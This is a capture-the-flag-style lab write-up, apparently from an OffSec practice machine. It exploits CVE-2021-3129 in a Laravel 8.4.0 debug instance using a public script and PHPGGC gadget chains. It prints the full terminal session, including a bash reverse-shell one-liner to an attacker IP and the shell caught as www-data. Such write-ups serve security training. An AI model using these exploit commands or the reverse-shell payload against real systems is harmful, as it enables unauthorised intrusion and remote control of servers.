CVE-2021-3129


The target Laravel instance appears to be vulnerable to CVE-2021-3129 due to its outdated version and option to enable the debug mode

Laravel Log Path


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129]
└─$ python3 CVE-2021-3129.py --host http://192.168.201.38/ 
 
  _____   _____   ___ __ ___ _    _____ ___ ___ 
 / __\ \ / / __|_|_  )  \_  ) |__|__ / |_  ) _ \
| (__ \ V /| _|___/ / () / /| |___|_ \ |/ /_,  /
 \___| \_/ |___| /___\__/___|_|  |___/_/___|/_/ 
 https://github.com/joshuavanderpoll/CVE-2021-3129
 Using PHPGGC: https://github.com/ambionics/phpggc
 
[@] Starting the exploit on "http://192.168.201.38/"...
[@] Testing vulnerable URL "http://192.168.201.38/_ignition/execute-solution"...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Laravel seems to be running on a Linux based machine.
[√] Laravel log path: "/var/www/html/lavita/storage/logs/laravel.log".
[•] Laravel version found: "8.4.0".
[•] Use "?" for a list of all available actions.
[?] Please enter a command to execute : 

Executing the exploit automatically finds the Laravel log path; /var/www/html/lavita/storage/logs/laravel.log

Commands


[?] Please enter a command to execute : ?
[•] Available commands
    exit                       -  Exit program..
    help                       -  Show available commands..
    clear_logs                 -  Clear Laravel logs..
    execute <command>          -  Execute system command..
    write <text>               -  Write to log file..
    patch <env/index/private>  -  Patch the vulnerability..
    patches                    -  Detailed information about patch modes.

There are several commands available within the exploit I’ll go with the execute command

PHPGGC


[?] Please enter a command to execute : execute id
[@] Executing command "id"...
[@] Generating payload...
[!] Required binary PHPGGC not found.
[@] Downloading PHPGGC from "ambionics/phpggc" GitHub repository...
[√] Downloaded/extracted PHPGGC.
[@] Updating PHPGGC execution permissions...
[√] Updated PHPGGC execution permissions.
PHP Deprecated:  Creation of dynamic property Illuminate\Validation\Rules\RequiredIf::$condition is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/8/gadgets.php on line 22
PHP Deprecated:  Creation of dynamic property Illuminate\Broadcasting\BroadcastEvent::$connection is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/9/gadgets.php on line 46
ERROR: Phar requires either a __destruct or a __wakeup vector
PHP Deprecated:  Creation of dynamic property Illuminate\Broadcasting\PendingBroadcast::$event is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/11/gadgets.php on line 22
PHP Deprecated:  Creation of dynamic property Illuminate\Broadcasting\PendingBroadcast::$events is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/11/gadgets.php on line 23
PHP Deprecated:  Creation of dynamic property Monolog\LogRecord::$mixed is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Monolog/RCE/8/gadgets.php on line 18
PHP Deprecated:  Creation of dynamic property Monolog\LogRecord::$mixed is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Monolog/RCE/9/gadgets.php on line 35
[√] Generated 21 payloads.
[@] Trying chain laravel/rce1 [1/21]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Output :
 
 
[√] Working chain found. You have now access to the 'patch' functionality.
[?] Would you like to try the next chain? [Y/N] : 

Executing a system command automatically downloads the PHPGGC tool, and generates all 21 available payloads. The first payload, laravel/rce1, appears to have failed as it does not show any output.

[?] Would you like to try the next chain? [Y/N] : Y
[@] Trying chain laravel/rce2 [2/21]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Output :
 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
[?] Would you like to try the next chain? [Y/N] : N

Moving on to the next payload, laravel/rce2, succeeded I will stick to the second gadget

Exploitation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129]
└─$ python3 CVE-2021-3129.py --host http://192.168.201.38/ --chain laravel/rce2 --exec 'bash -c "bash -i >& /dev/tcp/192.168.45.249/9999 0>&1"'
  _____   _____   ___ __ ___ _    _____ ___ ___ 
 / __\ \ / / __|_|_  )  \_  ) |__|__ / |_  ) _ \
| (__ \ V /| _|___/ / () / /| |___|_ \ |/ /_,  /
 \___| \_/ |___| /___\__/___|_|  |___/_/___|/_/ 
 https://github.com/joshuavanderpoll/CVE-2021-3129
 Using PHPGGC: https://github.com/ambionics/phpggc
 
[@] Starting the exploit on "http://192.168.201.38/"...
[@] Testing vulnerable URL "http://192.168.201.38/_ignition/execute-solution"...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Laravel seems to be running on a Linux based machine.
[√] Laravel log path: "/var/www/html/lavita/storage/logs/laravel.log".
[•] Laravel version found: "8.4.0".
[@] Clearing Laravel logs...
[√] Cleared Laravel logs!
[@] Executing command "bash -c "bash -i >& /dev/tcp/192.168.45.249/9999 0>&1""...
[@] Generating payload...
[√] Generated 1 payloads.
[@] Trying chain laravel/rce2 [1/1]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.

Executing the exploit script with a reverse shell payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.201.38] 37766
bash: cannot set terminal process group (605): Inappropriate ioctl for device
bash: no job control in this shell
www-data@debian:/$ whoami
whoami
www-data
www-data@debian:/$ hostname
hostname
debian
www-data@debian:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:2c:5d brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.201.38/24 brd 192.168.201.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe9e:2c5d/64 scope link 
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the www-data account via exploiting CVE-2021-3129